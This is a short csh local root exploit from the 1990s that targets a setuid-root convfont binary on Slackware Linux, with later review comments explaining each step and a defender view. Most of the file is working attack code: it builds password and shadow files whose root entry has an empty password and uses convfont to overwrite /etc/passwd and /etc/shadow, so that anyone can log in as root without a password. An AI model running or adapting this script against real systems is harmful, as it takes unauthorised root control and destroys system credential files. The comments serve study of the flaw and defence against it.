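# Gday. This is a small exploit written in csh that uses the bug in
# convfont where it runs as uid 0. convfont loads in a file and reorders it
# to form a fontfile. It is possible to define the output of the program:
# the caller names the output file, so a setuid-root convfont will write
# to paths that only root should be able to change.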

# This script creates new password (and shadow if necessary) files, giving
# the root user no password.

# It has been tested on Slackware 2.0 and Slackware 3.0 setups. If there 
# are any problems then:

# 1) Check to see if convfont is installed (part of the svgalib)
# 2) Check it is setuid root
# 3) Make sure it *is* a Linux system :)

#!/bin/csh

# Banner: prints the author name, a contact address and the binary the
# script targets.
echo "convfont exploit - by Squidge"
echo "squidge@onyx.infonexus.com"
echo " "
echo "this will get you root by exploiting a hole in /usr/bin/convfont"

#NOTE: If this auto-detect screws up, alter the variable PW_TYPE
#      PW_TYPE = "plain" is for a normal /etc/passwd
#      PW_TYPE = "shadow" is for a shadow /etc/passwd /etc/shadow combo

# Replaces PATH with one that has the current directory first. The later
# convfont calls are written without a path, so they are resolved through
# this PATH rather than the /usr/bin/convfont named in the banner.
setenv PATH .:/bin:/usr/bin:/sbin:/usr/sbin 
echo " "
echo "determining system type"

# Picks the password layout by testing whether /etc/shadow exists. PW_TYPE
# is read further down to decide whether a crafted shadow entry is written.
if ( -e /etc/shadow ) then		# aha ! is a shadow system
	echo "found a shadow password system. good job we're ueberhackers :)"
	set PW_TYPE = shadow
else
	echo "found a normal password system. make some effort, mr root !"
	set PW_TYPE = plain
endif

# Builds the input files that are later handed to convfont. Both are written
# under fixed, predictable names in /tmp.
set loop = 0
set limit = 100

# Truncates /tmp/passwd and writes one root entry with an empty password
# field (the second colon-separated field).
echo > /tmp/passwd root::0:0:Squidge is an Ueberhacker:/:/bin/sh

# On a shadow system, also writes a root entry with an empty hash field.
if ( $PW_TYPE == "shadow" ) then
	echo > /tmp/shadow root::9566:0:99999:14:::
endif
echo "building passwd entry. please wait."
# Appends 100 lines of 30 spaces to each file and prints a progress dot per
# pass. The append to /tmp/shadow is not guarded by PW_TYPE, so that file is
# created on plain systems as well.
# NOTE(review): the purpose of the padding is not shown in this script;
# presumably it fills the input out to a size convfont accepts - confirm.
while ( $loop < $limit )
	@ loop++
	echo >> /tmp/passwd "                              "
	echo >> /tmp/shadow "                              "
	echo -n .
end
echo " "
# Overwrites the system password files through convfont.
# Defender view: the write succeeds only when convfont is setuid root, which
# is the precondition the failure message below also names. Clearing the
# setuid bit on convfont removes that precondition. Traces this section
# leaves: /tmp/real.passwd, a root entry with an empty password field in
# /etc/passwd, and an /etc/shadow written by a convfont process.
echo " "
echo "installing fake passwds"
echo "backing up /etc/passwd to /tmp"

# Copies the original /etc/passwd aside. Nothing in this script restores it
# or deletes the copy.
cp /etc/passwd /tmp/real.passwd

# Only prints a message; no copy of /etc/shadow is attempted.
if ( $PW_TYPE == "shadow" ) then
	echo "unable to backup /etc/shadow tho, as it is mode 600"
endif

# Arguments are: crafted input file, the literal 32, and the output path.
# Both calls run regardless of PW_TYPE, so the second one targets
# /etc/shadow on plain systems too.
convfont /tmp/passwd 32 /etc/passwd > /dev/null
convfont /tmp/shadow 32 /etc/shadow > /dev/null

# status holds the exit code of the most recent command only, which here is
# the second convfont call. On a non-zero status the script prints the two
# likely causes and exits before the cleanup, leaving the /tmp files behind.
if ( $status != 0 ) then
	echo "\!\!\! warning. Something dodgy occured. It could be:"
	echo "    convfont isn't installed"
	echo "    convfont isn't setuid root"
	exit
endif

# Closing messages, then removal of the two crafted input files.
# /tmp/real.passwd is not in the rm list, so the copy of the original
# /etc/passwd stays on disk as an artifact of the run.
echo "now return to a login prompt, and type root. you don't need a password"
echo "be sensible, and remember: squidge - The Guild"
echo "                           *******************"
rm -f /tmp/passwd /tmp/shadow
